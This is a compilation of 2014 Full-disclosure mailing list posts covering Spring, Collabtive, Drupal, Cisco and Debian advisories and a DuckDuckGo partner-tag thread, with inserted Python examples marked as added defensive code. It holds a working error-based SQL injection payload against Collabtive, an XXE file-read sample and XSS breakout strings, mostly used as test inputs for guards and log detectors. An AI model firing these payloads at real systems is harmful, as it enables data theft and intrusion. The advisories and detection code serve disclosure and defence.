Re: [Full-disclosure] Ubuntu, duckduckgo, and additional info
There is a reddit post regarding this. Please see http://www.reddit.com/r/Ubuntu/comments/1jek5d/why_am_i_seeing_canonical_when_i_search_using/

Daniel

On Jan 14, 2014, at 6:41 AM, silence_is_b...@hushmail.com wrote:

> Any particular reason when setting duckduckgo as the default search and searching from the url bar we get an additional nugget of info sent? Case in point:
>
> GET /?q=add+duckduckgo&t=canonical HTTP/1.1
> Host: duckduckgo.com
> User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:26.0) Gecko/20100101 Firefox/26.0
> Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
> Accept-Language: en-US,en;q=0.5
> Accept-Encoding: gzip, deflate
> DNT: 1
> Connection: keep-alive
>
> I didn't add canonical... so why is it there? In about:config I see "distribution.id canonical". Why is this being sent? Duckduckgo didn't respond, so I thought I'd ask here. Ironic...

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] CVE-2013-6429 Fix for XML External Entity (XXE) injection (CVE-2013-4152) in Spring Framework was incomplete
Severity: Important

Vendor: Spring by Pivotal

Versions Affected:
- Spring MVC 3.0.0 to 3.2.4
- Spring MVC 4.0.0.M1 to 4.0.0.RC1
- Earlier unsupported versions may be affected

Description:
Spring MVC's SourceHttpMessageConverter also processed user-provided XML and neither disabled XML external entities nor provided an option to disable them. SourceHttpMessageConverter has been modified to provide an option to control the processing of XML external entities, and that processing is now disabled by default.

Mitigation:
Users of affected versions should apply the following mitigation:
- Users of 3.x should upgrade to 3.2.5 or later
- Users of 4.x should upgrade to 4.0.0 or later (this is also fixed in 4.0.0-RC2, but users are recommended to use 4.0.0 or later)

Credit:
This issue was identified by the Spring development team.

References:
http://www.gopivotal.com/security/cve-2013-6429
https://jira.springsource.org/browse/SPR-11078
https://github.com/spring-projects/spring-framework/commit/2ae6a6a3415eebc57babcb9d3e5505887eda6d8a
http://www.gopivotal.com/security/cve-2013-4152

History:
2014-Jan-14: Initial vulnerability report published.
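The fix the advisory describes is an option that turns external-entity processing off by default. The same defence in Python, as an added example that is not Spring's code: a pre-flight pass over the document using only the standard library's expat bindings, which rejects any DOCTYPE in strict mode and, when internal DTDs must be accepted, still rejects every entity carrying a SYSTEM or PUBLIC identifier and every parameter entity. The sample documents are constructed for the demo; nothing is fetched from disk, because expat does not resolve external entities unless a handler asks it to, and the guard aborts at the declaration anyway.

```python
"""Pre-flight XXE guard for untrusted XML, built on the stdlib expat bindings.

Added example (not Spring's code). It mirrors the fix the advisory
describes: external-entity processing is off unless explicitly enabled.
"""
import xml.etree.ElementTree as ET
import xml.parsers.expat


class UnsafeXMLError(ValueError):
    """Raised when a document declares something we refuse to process."""


def scan_dtd(data: bytes, allow_internal_dtd: bool = False) -> dict:
    """Run expat over `data` with only DTD-related handlers installed.

    Returns a summary of what was declared, or raises UnsafeXMLError as
    soon as a DOCTYPE (strict mode) or an external/parameter entity is seen.
    Raising inside a handler aborts the parse, so nothing after the
    offending declaration is processed.
    """
    summary = {"doctype": None, "internal_entities": []}
    parser = xml.parsers.expat.ParserCreate()

    def on_doctype(name, system_id, public_id, has_internal_subset):
        if not allow_internal_dtd:
            raise UnsafeXMLError("DOCTYPE declaration rejected: <!DOCTYPE %s>" % name)
        if system_id or public_id:
            raise UnsafeXMLError("external DTD subset rejected: %r" % (system_id or public_id))
        summary["doctype"] = name

    def on_entity_decl(name, is_parameter, value, base, system_id, public_id, notation):
        # External general entities (SYSTEM/PUBLIC) are the XXE primitive;
        # parameter entities are how out-of-band XXE smuggles them in.
        if system_id is not None or public_id is not None:
            raise UnsafeXMLError("external entity rejected: %s -> %r" % (name, system_id or public_id))
        if is_parameter:
            raise UnsafeXMLError("parameter entity rejected: %%%s;" % name)
        summary["internal_entities"].append(name)

    parser.StartDoctypeDeclHandler = on_doctype
    parser.EntityDeclHandler = on_entity_decl
    parser.Parse(data, True)
    return summary


def parse_untrusted(data: bytes, allow_internal_dtd: bool = False) -> ET.Element:
    """Parse XML from an untrusted source, refusing DTD hazards first."""
    scan_dtd(data, allow_internal_dtd)
    return ET.fromstring(data)


def is_safe(data: bytes, allow_internal_dtd: bool = False) -> bool:
    try:
        scan_dtd(data, allow_internal_dtd)
    except UnsafeXMLError:
        return False
    return True


# Constructed samples: an ordinary document, a classic file-read XXE probe,
# and one that only uses a harmless internal entity.
BENIGN = b'<?xml version="1.0"?><order><id>42</id><note>thanks</note></order>'
XXE = (b'<?xml version="1.0"?>'
       b'<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>'
       b'<foo>&xxe;</foo>')
INTERNAL_ONLY = (b'<?xml version="1.0"?>'
                 b'<!DOCTYPE foo [<!ENTITY greet "hello">]>'
                 b'<foo>&greet;</foo>')

if __name__ == "__main__":
    print(parse_untrusted(BENIGN).find("id").text)
    for sample in (XXE, INTERNAL_ONLY):
        try:
            parse_untrusted(sample)
        except UnsafeXMLError as exc:
            print("rejected:", exc)
    # Relaxed mode: internal entities are fine, external ones still are not.
    print(parse_untrusted(INTERNAL_ONLY, allow_internal_dtd=True).text)
    print(is_safe(XXE, allow_internal_dtd=True))
```

Strict mode (no DOCTYPE at all) is the right default for an HTTP message converter, since clients have no legitimate reason to ship a DTD with a request body; the relaxed mode exists for feeds that carry harmless internal entities and still refuses the external ones.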
[Full-disclosure] CVE-2013-6430 Possible XSS when using Spring MVC
Severity: Low

Vendor: Spring by Pivotal

Versions Affected:
- Spring MVC 3.0.0 to 3.2.1
- Earlier unsupported versions may be affected

Description:
The JavaScriptUtils.javaScriptEscape() method did not escape all characters that are sensitive within a JS single-quoted string, a JS double-quoted string, or an HTML script data context. In most cases this will result in an unexploitable parse error, but in some cases it could result in an XSS vulnerability.

Mitigation:
Users of affected versions should apply the following mitigation:
- Users of 3.x should upgrade to 3.2.2 or later

Credit:
This issue was originally reported to the Spring Framework developers by Jon Passki, and the security implications were brought to the attention of the Pivotal security team by Arun Neelicattu.

References:
http://www.gopivotal.com/security/cve-2013-6430
https://jira.springsource.org/browse/SPR-9983
https://github.com/spring-projects/spring-framework/commit/7a7df6637478607bef0277bf52a4e0a03e20a248

History:
2014-Jan-14: Initial vulnerability report published.
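The three contexts the advisory names (JS single-quoted string, JS double-quoted string, HTML script data) each have their own set of dangerous characters, and an escaper that only thinks about the JS grammar misses the HTML ones. The following is an added example in Python, not Spring's JavaScriptUtils, and the advisory does not say which characters 3.2.1 missed, so the "quotes only" variant here stands in for the general shape of the gap. It pairs the incomplete escaper with a complete one and a checker that tells whether an escaped value can still terminate the script block or the string literal; the attacker inputs are constructed.

```python
"""JavaScript string-literal escaping for inline <script> blocks.

Added example (not Spring's JavaScriptUtils). It contrasts an escaper that
only handles the quote characters with one that also covers the HTML
script-data context and JS line terminators.
"""
import re

# Characters that must never appear raw inside a JS string literal that
# is embedded in HTML script data. Every replacement is valid in both
# single- and double-quoted literals.
_FULL_TABLE = {
    "\\": "\\\\", '"': '\\"', "'": "\\'",
    "/": "\\/",            # neutralises "</script>" and "<!--" tricks
    "<": "\\u003C", ">": "\\u003E", "&": "\\u0026",
    "\n": "\\n", "\r": "\\r", "\t": "\\t", "\f": "\\f", "\b": "\\b", "\v": "\\u000B",
    "\u2028": "\\u2028",   # LINE SEPARATOR: a JS line terminator
    "\u2029": "\\u2029",   # PARAGRAPH SEPARATOR: also a JS line terminator
}


def js_escape_quotes_only(value: str) -> str:
    """The incomplete variant: fine for the JS grammar in isolation, not for HTML."""
    return (value.replace("\\", "\\\\").replace('"', '\\"').replace("'", "\\'")
                 .replace("\n", "\\n").replace("\r", "\\r"))


def js_escape(value: str) -> str:
    """Escape for a JS string literal (either quote style) inside <script>."""
    out = []
    for ch in value:
        if ch in _FULL_TABLE:
            out.append(_FULL_TABLE[ch])
        elif ord(ch) < 0x20 or ord(ch) == 0x7F:
            out.append("\\u%04X" % ord(ch))   # remaining control characters
        else:
            out.append(ch)
    return "".join(out)


# Why the HTML context matters: the HTML tokenizer closes script data at
# "</script" regardless of JS quoting, and a raw U+2028/U+2029 ends a JS
# string literal in pre-ES2019 engines just as a newline does.
_END_SCRIPT = re.compile(r"</script[\s/>]", re.IGNORECASE)
_RAW_TERMINATORS = re.compile("[\n\r\u2028\u2029]")


def breaks_out(escaped: str) -> bool:
    """True if `escaped`, placed inside quotes in a <script>, can leave the literal."""
    return bool(_END_SCRIPT.search(escaped) or _RAW_TERMINATORS.search(escaped))


def render_greeting(name: str) -> str:
    """Emit an inline script that assigns an attacker-influenced value."""
    return '<script>var user = "%s";</script>' % js_escape(name)


# Constructed attacker inputs.
PAYLOAD_CLOSE_TAG = '</script><script>alert(1)</script>'
PAYLOAD_LINE_SEP = 'x\u2028alert(1)//'

if __name__ == "__main__":
    for p in (PAYLOAD_CLOSE_TAG, PAYLOAD_LINE_SEP):
        print("quotes-only escaper breaks out:", breaks_out(js_escape_quotes_only(p)))
        print("full escaper breaks out:      ", breaks_out(js_escape(p)))
    print(render_greeting("O'Brien <script>"))
```

Escaping "/" alone already defeats "</script>" (the tokenizer needs the literal slash), so the \u003C/\u003E/\u0026 entries are defence in depth for templates that also land the value in an HTML attribute or a "<!--" sequence.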
Re: [Full-disclosure] Ubuntu, duckduckgo, and additional info
> Any particular reason when setting duckduckgo as the default search and searching from the url bar we get an additional nugget of info sent?

We use the t=partner parameter to anonymously count the number of searches for revenue sharing. We have 90+ partners doing this, mainly open source browsers and distributions. Here's the relevant link on launchpad for Canonical: https://code.launchpad.net/~caine/chromium-browser/duckduckgo/+merge/182416

--
Gabriel, http://ye.gg/
Re: [Full-disclosure] Ubuntu, duckduckgo, and additional info
On 01/14/2014 at 6:22 PM, Seth Arnold wrote:

> On Tue, Jan 14, 2014 at 05:41:42AM -0700, silence_is_b...@hushmail.com wrote:
>> Any particular reason when setting duckduckgo as the default search and searching from the url bar we get an additional nugget of info sent? Case in point:
>>
>> GET /?q=add+duckduckgo&t=canonical HTTP/1.1
>> [...]
>> I didn't add canonical... so why is it there? In about:config I see [...] Why is this being sent? Duckduckgo didn't respond, so I thought I'd ask here. Ironic...
>
> This behaviour is documented on the duckduckgo website:
> https://duck.co/help/privacy/t
> https://duck.co/help/desktop/linux-distributions
>
> Thanks

Thank you for the responses, folks. I'm going to take a stab and say the distribution.id is where that's held. It upsets my sense of neatness when I'm spoofing my UA, only to have tidbits added ;)

Thanks again.
[Full-disclosure] Collabtive Sql Injection
##=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+##
||                                                                    ||
||  Advisory           : Collabtive SQL Injection                     ||
||  Affected Version   : 1.1                                          ||
||  Vendor             : http://collabtive.o-dyn.de/index.php         ||
||  Risk               : Medium                                       ||
||  CVE-ID             : CVE-2013-6872                                ||
||  Tested on Platform : Windows 7                                    ||
##=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+##

== Product Description:

Collabtive is web-based project management software. The project was started in November 2007. It is open source software and provides an alternative to proprietary tools like Basecamp. Collabtive is written in PHP and JavaScript. Collabtive is intended for small to medium-sized businesses and freelancers. We offer commercial services for installation and customization of Collabtive. It can also be installed on an internal server as well as in the cloud. All major browsers like Internet Explorer, Firefox, Chrome and Safari are supported. Collabtive is developed by a team of professional volunteers. Everyone involved is a pro in their respective areas, providing high quality contributions to the project. (from product home page)

Collabtive has more than 1000 downloads per week.

== Vulnerability Description:

A double-query (error-based) SQL injection vulnerability has been detected in the Collabtive web application. The application fails to sanitize user-supplied input in the id parameter of managetimetracker.php. The user must be authenticated to exploit this vulnerability.

This vulnerability was tested with Collabtive 1.1. Other versions may also be affected.

=== Impact:

Successful exploitation of this vulnerability will allow a remote authenticated attacker to extract sensitive and confidential data from the database.

=== Proof of Concept:

URL:
http://www.example.com/collabtive/managetimetracker.php?action=projectpdf&id=2

PAYLOAD:
and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,cast(schema_name as char),0x27,0x7e) FROM information_schema.schemata LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1

Example: The following request will show the name of the first database in the error message.
http://www.example.com/collabtive/managetimetracker.php?action=projectpdf&id=2and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,cast(schema_name as char),0x27,0x7e) FROM information_schema.schemata LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1

=== Solution:

There is no known workaround available. This vulnerability has been fixed in version 1.2 of Collabtive.

=== Disclosure Timeline:

~ Vendor notification: 26th November 2013
~ Vendor response: 27th November 2013
~ Vendor released updates: 4th January 2014
~ Public disclosure: 15th January 2014

=== Advisory discovered by:

Yogesh Phadtare
Secur-I Research Group
http://securview.com/
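The proof of concept above is the textbook MySQL double-query pattern: a count(*) over a subquery grouped by floor(rand(0)*2) forces a duplicate-key error whose message carries the concat()ed data between 0x7e ('~') delimiters. Those building blocks are easy to spot in web server logs. The following is an added detection example, not part of the advisory: it pulls the request line out of common-log-format entries, decodes and normalises each query parameter, scores it against the markers of this technique, and additionally flags a value in a parameter that the application treats as an integer (id) when it is not purely numeric. The log lines are constructed; the injected value is the advisory's own payload, URL-encoded as a browser would send it.

```python
"""Flag error-based (double-query) SQL injection attempts in access logs.

Added example for detection engineers; it is not part of the advisory.
The log lines are constructed here; the injected value is the advisory's
proof-of-concept payload, so the detector is checked against a realistic input.
"""
import re
from urllib.parse import parse_qs, quote, unquote_plus, urlsplit

# Marker patterns, matched against a lower-cased, whitespace-collapsed value.
SIGNATURES = {
    "double_query_rand_groupby": re.compile(r"floor\(\s*rand\(\s*0?\s*\)\s*\*\s*2\s*\)"),
    "group_by": re.compile(r"\bgroup\s+by\b"),
    "count_star": re.compile(r"\bcount\(\s*\*\s*\)"),
    "information_schema": re.compile(r"\binformation_schema\."),
    "xml_error_function": re.compile(r"\b(?:updatexml|extractvalue)\s*\("),
    "hex_delimiter": re.compile(r"\b0x7e\b"),
}
# Parameters the application treats as integers; anything else in them is suspicious.
NUMERIC_PARAMS = {"id"}

_REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')


def normalise(value: str) -> str:
    # Decode twice: attackers double-encode to get past single-pass filters.
    v = unquote_plus(unquote_plus(value))
    v = re.sub(r"/\*.*?\*/", " ", v)      # inline comments used as whitespace
    return re.sub(r"\s+", " ", v).lower()


def analyse_query(query: str) -> list:
    """Return one finding per suspicious parameter: {param, reasons, score}."""
    findings = []
    for param, values in parse_qs(query, keep_blank_values=True).items():
        for raw in values:
            v = normalise(raw)
            reasons = [name for name, rx in SIGNATURES.items() if rx.search(v)]
            if param in NUMERIC_PARAMS and not re.fullmatch(r"-?\d+", v.strip()):
                reasons.append("non_numeric_%s" % param)
            if reasons:
                findings.append({"param": param, "reasons": reasons, "score": len(reasons)})
    return findings


def scan_log(lines) -> list:
    """Return (line_no, path, findings) for each request line that trips a rule."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = _REQUEST.search(line)
        if not m:
            continue
        parts = urlsplit(m.group(1))
        findings = analyse_query(parts.query)
        if findings:
            hits.append((n, parts.path, findings))
    return hits


# The advisory's PoC payload, appended to the numeric id parameter.
POC = ("2and(select 1 from(select count(*),concat((select (select (SELECT distinct "
       "concat(0x7e,0x27,cast(schema_name as char),0x27,0x7e) FROM information_schema.schemata "
       "LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x "
       "from information_schema.tables group by x)a) and 1=1")


def _line(path_and_query, status):
    # Constructed common-log-format entry.
    return '10.0.0.7 - - [15/Jan/2014:09:12:01 +0000] "GET %s HTTP/1.1" %s 2048' % (path_and_query, status)


SAMPLE_LOG = [
    _line("/collabtive/managetimetracker.php?action=projectpdf&id=2", "200"),
    _line("/collabtive/managetimetracker.php?action=projectpdf&id=" + quote(POC, safe="(),=*"), "500"),
    _line("/collabtive/index.php?mode=overview", "200"),
]

if __name__ == "__main__":
    for line_no, path, findings in scan_log(SAMPLE_LOG):
        print(line_no, path, findings)
```

The non-numeric check on id is the cheapest and most robust rule here: it needs no signature and would also have caught the request at the application layer, which is what the fix in 1.2 amounts to for an integer parameter.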
[Full-disclosure] [SECURITY] [DSA 2844-1] djvulibre security update
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- -------------------------------------------------------------------------
Debian Security Advisory DSA-2844-1                   secur...@debian.org
http://www.debian.org/security/                           Raphael Geissert
January 15, 2014                       http://www.debian.org/security/faq
- -------------------------------------------------------------------------

Package        : djvulibre
Vulnerability  : arbitrary code execution
Problem type   : local (remote)
Debian-specific: no
CVE ID         : CVE-2012-6535

It was discovered that djvulibre, the Open Source DjVu implementation project, can be crashed or possibly be made to execute arbitrary code when processing a specially crafted djvu file.

For the oldstable distribution (squeeze), this problem has been fixed in version 3.5.23-3+squeeze1.

This problem was fixed before the release of the stable distribution (wheezy), which is therefore not affected.

We recommend that you upgrade your djvulibre packages.

Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: http://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.15 (GNU/Linux)

iEYEARECAAYFAlLWMNkACgkQYy49rUbZzlpnSQCaAiO7/4BQmnrHakecARECdnqe
hj0AmwUTht5DGh7ljX9raoP7RKYDWH/S
=TpZ4
-----END PGP SIGNATURE-----
[Full-disclosure] Cisco Security Advisory: Multiple Vulnerabilities in Cisco Secure Access Control System
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

Cisco Security Advisory: Multiple Vulnerabilities in Cisco Secure Access Control System

Advisory ID: cisco-sa-20140115-csacs

Revision 1.0

For Public Release 2014 January 15 12:00 UTC (GMT)

+---------------------------------------------------------------------

Summary
=======

Cisco Secure Access Control System (ACS) is affected by the following vulnerabilities:

  Cisco Secure ACS RMI Privilege Escalation Vulnerability
  Cisco Secure ACS RMI Unauthenticated User Access Vulnerability
  Cisco Secure ACS Operating System Command Injection Vulnerability

Cisco Secure ACS uses the Remote Method Invocation (RMI) interface for internode communication using TCP ports 2020 and 2030.

These vulnerabilities are independent of each other; a release that is affected by one of the vulnerabilities may not be affected by the others.

Cisco has released free software updates that address these vulnerabilities.

This advisory is available at the following link:
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20140115-csacs

Network-based mitigations for the RMI-based vulnerabilities are outlined in the Cisco Applied Mitigation Bulletin: Identifying and Mitigating the Multiple Vulnerabilities in Cisco Secure Access Control System
http://tools.cisco.com/security/center/viewAMBAlert.x?alertId=32120
-----BEGIN PGP SIGNATURE-----
Version: GnuPG/MacGPG2 v2.0.20 (Darwin)

iF4EAREKAAYFAlLWjpIACgkQUddfH3/BbTosbAD/VuzxU5TkUyAhJLycJHyypiRg
fZpaJ6IZvX+mjLRTidMA/iYaghbeg9GGU1a9FlRZt+WC/BNaodIGGU35zzlM+Ztb
=ffTY
-----END PGP SIGNATURE-----
Re: [Full-disclosure] Ubuntu, duckduckgo, and additional info
On 01/15/2014 at 5:08 AM, Gabriel Weinberg wrote:

>> Any particular reason when setting duckduckgo as the default search and searching from the url bar we get an additional nugget of info sent?
>
> We use the t=partner parameter to anonymously count the number of searches for revenue sharing. We have 90+ partners doing this, mainly open source browsers and distributions. Here's the relevant link on launchpad for Canonical: https://code.launchpad.net/~caine/chromium-browser/duckduckgo/+merge/182416
>
> --
> Gabriel, http://ye.gg/

I see, thank you. My distribution.id nuke did nothing... any way to disable this? It's all about choice after all, right ;)
[Full-disclosure] [Security-news] SA-CORE-2014-001 - Drupal core - Multiple vulnerabilities
View online: https://drupal.org/SA-CORE-2014-001

* Advisory ID: DRUPAL-SA-CORE-2014-001
* Project: Drupal core [1]
* Version: 6.x, 7.x
* Date: 2014-January-15
* Security risk: Highly critical [2]
* Exploitable from: Remote
* Vulnerability: Multiple vulnerabilities

DESCRIPTION
-----------
Multiple vulnerabilities were fixed in the supported Drupal core versions 6 and 7.

Impersonation (OpenID module - Drupal 6 and 7 - Highly critical)

A vulnerability was found in the OpenID module that allows a malicious user to log in as other users on the site, including administrators, and hijack their accounts.

This vulnerability is mitigated by the fact that the malicious user must have an account on the site (or be able to create one), and the victim must have an account with one or more associated OpenID identities.

Access bypass (Taxonomy module - Drupal 7 - Moderately critical)

The Taxonomy module provides various listing pages which display content tagged with a particular taxonomy term. Custom or contributed modules may also provide similar lists. Under certain circumstances, unpublished content can appear on these pages and will be visible to users who should not have permission to see it.

This vulnerability is mitigated by the fact that it only occurs on Drupal 7 sites which upgraded from Drupal 6 or earlier.

Security hardening (Form API - Drupal 7 - Not critical)

The form API provides a method for developers to submit forms programmatically using the function drupal_form_submit(). During programmatic form submissions, all access checks are deliberately bypassed, and any form element may be submitted regardless of the current user's access level. This is normal and expected behavior for most uses of programmatic form submissions; however, there are cases where custom or contributed code may need to send data provided by the current (untrusted) user to drupal_form_submit() and therefore need to respect access control on the form.

To facilitate this, a new, optional $form_state['programmed_bypass_access_check'] element has been added to the Drupal 7 form API. If this is provided and set to FALSE, drupal_form_submit() will perform the normal form access checks against the current user while submitting the form, rather than bypassing them.

This change does not fix a security issue in Drupal core itself, but rather provides a method for custom or contributed code to fix security issues that would be difficult or impossible to fix otherwise.

CVE IDENTIFIER(S) ISSUED
------------------------
* /A CVE identifier [3] will be requested, and added upon issuance, in accordance with Drupal Security Team processes./

VERSIONS AFFECTED
-----------------
* Drupal core 6.x versions prior to 6.30.
* Drupal core 7.x versions prior to 7.26.

SOLUTION
--------
Install the latest version:
* If you use Drupal 6.x, upgrade to Drupal core 6.30 [4].
* If you use Drupal 7.x, upgrade to Drupal core 7.26 [5].

Also see the Drupal core [6] project page.

REPORTED BY
-----------
* The OpenID module impersonation issue was reported by Christian Mainka [7] and Vladislav Mladenov.
* The Taxonomy module access bypass issue was reported by Matt Vance [8], and by Damien Tournoud [9] of the Drupal Security Team.
* The form API access bypass issue was reported by David Rothstein [10] of the Drupal Security Team.

FIXED BY
--------
* The OpenID module impersonation issue was fixed by Damien Tournoud [11], Heine Deelstra [12], Peter Wolanin [13], and David Rothstein [14], all of the Drupal Security Team.
* The Taxonomy module access bypass issue was fixed by Jibran Ijaz [15], and by Lee Rowlands [16] of the Drupal Security Team.
* The form API access bypass issue was fixed by Damien Tournoud [17] and David Rothstein [18] of the Drupal Security Team, and by Marc Ingram [19] and Kyle Browning [20].

COORDINATED BY
--------------
* The Drupal Security Team [21]

CONTACT AND MORE INFORMATION
----------------------------
The Drupal security team can be reached at security at drupal.org or via the contact form at http://drupal.org/contact [22].

Learn more about the Drupal Security team and their policies [23], writing secure code for Drupal [24], and securing your site [25].

Follow the Drupal Security Team on Twitter at https://twitter.com/drupalsecurity [26]

[1] http://drupal.org/project/drupal
[2] http://drupal.org/security-team/risk-levels
[3] http://cve.mitre.org/
[4] http://drupal.org/drupal-6.30-release-notes
[5]
[Full-disclosure] [Security-news] SA-CONTRIB-2014-002 - Anonymous Posting - Cross Site Scripting (XSS)
View online: https://drupal.org/node/2173321

* Advisory ID: DRUPAL-SA-CONTRIB-2014-002
* Project: Anonymous Posting [1] (third-party module)
* Version: 7.x
* Date: 2014-01-15
* Security risk: Moderately critical [2]
* Exploitable from: Remote
* Vulnerability: Cross Site Scripting

DESCRIPTION
-----------
This module allows anonymous users to fill in their contact information (name, email and homepage) when posting any content type, including Forum Topics. This allows the submitted name to be shown instead of the usual anonymous string provided by Drupal core.

The module doesn't properly sanitize the name submitted by the anonymous user before it is output.

This vulnerability is mitigated only by the fact that use of anonymous posting data must be enabled on a per content type basis by a user with permission to do so, since it is not enabled by default. However, when configured for its intended purpose, the vulnerability is not mitigated.

CVE IDENTIFIER(S) ISSUED
------------------------
* /A CVE identifier [3] will be requested, and added upon issuance, in accordance with Drupal Security Team processes./

VERSIONS AFFECTED
-----------------
* Anonymous Posting 7.x-1.x versions 7.x-1.2 and 7.x-1.3

Drupal core is not affected. If you do not use the contributed Anonymous Posting [4] module, there is nothing you need to do.

SOLUTION
--------
* Install the latest version: 7.x-1.4 [5]

Also see the Anonymous Posting [6] project page.

REPORTED BY
-----------
* drikc [7], the module maintainer

FIXED BY
--------
* drikc [8], the module maintainer

COORDINATED BY
--------------
* Rick Manelius [9], provisional member of the Drupal Security Team

CONTACT AND MORE INFORMATION
----------------------------
The Drupal security team can be reached at security at drupal.org or via the contact form at http://drupal.org/contact [10].

Learn more about the Drupal Security team and their policies [11], writing secure code for Drupal [12], and securing your site [13].

Follow the Drupal Security Team on Twitter at https://twitter.com/drupalsecurity [14]

[1] http://drupal.org/project/anonymous_posting
[2] http://drupal.org/security-team/risk-levels
[3] http://cve.mitre.org/
[4] http://drupal.org/project/anonymous_posting
[5] https://drupal.org/node/2173437
[6] http://drupal.org/project/anonymous_posting
[7] http://drupal.org/user/13299
[8] http://drupal.org/user/13299
[9] http://drupal.org/user/680072
[10] http://drupal.org/contact
[11] http://drupal.org/security-team
[12] http://drupal.org/writing-secure-code
[13] http://drupal.org/security/secure-configuration
[14] https://twitter.com/drupalsecurity

___
Security-news mailing list
security-n...@drupal.org
Unsubscribe at http://lists.drupal.org/mailman/listinfo/security-news
Re: [Full-disclosure] Ubuntu, duckduckgo, and additional info
On Wed, Jan 15, 2014 at 05:47:24AM -0700, silence_is_b...@hushmail.com wrote:
> I see, thank you. My distribution.id nuke did nothing... any way to disable this? It's all about choice after all, right ;)

Depends upon the browser. For Firefox, see:

/usr/lib/firefox/distribution/searchplugins/locale/en-US/duckduckgo.xml

The merge at https://code.launchpad.net/~caine/chromium-browser/duckduckgo/+merge/182416 gives me the strong impression that it will be harder to change in chromium-browser; it may take a recompile. Probably it would be easier to add your own search engines to chromium-browser without recompiling, though I don't know chromium-browser well enough to suggest them.

Thanks
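The Firefox search plugin files the reply points at are OpenSearch XML, and the partner identifier lives there as a fixed-value Param alongside the {searchTerms} placeholder. The following is an added example, not from the thread: a small audit that lists every fixed-value Param in a plugin (anything whose value is not a template variable) and a helper that removes the ones you name. The plugin XML is constructed to resemble the Firefox searchplugin format; the actual contents of the duckduckgo.xml shipped by Ubuntu are assumed, not copied from the file.

```python
"""Audit Firefox/OpenSearch search-plugin XML for fixed partner parameters.

Added example, not from the thread. The plugin XML below is constructed to
resemble the Firefox searchplugin format; the real file contents under
/usr/lib/firefox/distribution/searchplugins/ are assumed.
"""
import xml.etree.ElementTree as ET

NS = {"os": "http://www.mozilla.org/2006/browser/search/"}


def static_params(plugin_xml: str) -> list:
    """Return (url_type, name, value) for every Param whose value is a fixed string.

    A value containing no "{" is not derived from the query or any other
    OpenSearch template variable, so it is sent identically with every search.
    Some of these are functional (a response-format selector, say); others,
    like a partner tag, exist to identify the distribution to the engine.
    """
    root = ET.fromstring(plugin_xml)
    found = []
    for url in root.findall("os:Url", NS):
        for param in url.findall("os:Param", NS):
            value = param.get("value", "")
            if "{" not in value:
                found.append((url.get("type"), param.get("name"), value))
    return found


def strip_params(plugin_xml: str, names) -> str:
    """Return the plugin XML with the named Params removed from every Url."""
    root = ET.fromstring(plugin_xml)
    for url in root.findall("os:Url", NS):
        for param in list(url.findall("os:Param", NS)):
            if param.get("name") in names:
                url.remove(param)
    ET.register_namespace("", NS["os"])   # keep the default namespace on output
    return ET.tostring(root, encoding="unicode")


# Constructed sample in the Firefox searchplugin layout (assumed, not the
# distribution's actual file).
SAMPLE_PLUGIN = """<?xml version="1.0" encoding="UTF-8"?>
<SearchPlugin xmlns="http://www.mozilla.org/2006/browser/search/">
  <ShortName>DuckDuckGo</ShortName>
  <Url type="text/html" method="GET" template="https://duckduckgo.com/">
    <Param name="q" value="{searchTerms}"/>
    <Param name="t" value="canonical"/>
  </Url>
  <Url type="application/x-suggestions+json" method="GET" template="https://duckduckgo.com/ac/">
    <Param name="q" value="{searchTerms}"/>
    <Param name="type" value="list"/>
  </Url>
</SearchPlugin>
"""

if __name__ == "__main__":
    for url_type, name, value in static_params(SAMPLE_PLUGIN):
        print("%-32s %s=%s" % (url_type, name, value))
    print(strip_params(SAMPLE_PLUGIN, {"t"}))
```

Run static_params over each file in the searchplugins directory to see what every bundled engine sends beyond the query; the t parameter here is the one the thread is about, while the type=list Param on the suggestions Url shows why the list needs a human decision rather than blanket removal.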
Re: [Full-disclosure] Ubuntu, duckduckgo, and additional info
On Wed, Jan 15, 2014 at 6:47 AM, silence_is_b...@hushmail.com wrote:
> I see, thank you. My distribution.id nuke did nothing... any way to disable this? It's all about choice after all, right ;)

Settings > Manage Search Engines > Add
[Full-disclosure] EE BrightBox router hacked - bares all if you ask nicely
The BrightBox router is the standard equipment issued by UK ISP Everything Everywhere (EE) to its subscribers. The device not only leaks sensitive data but is remotely exploitable too. An attacker even has the ability to take control of your account, as the router leaks your ISP account credentials.

You can read the full article here: https://scotthelme.co.uk/ee-brightbox-router-hacked/

Scott.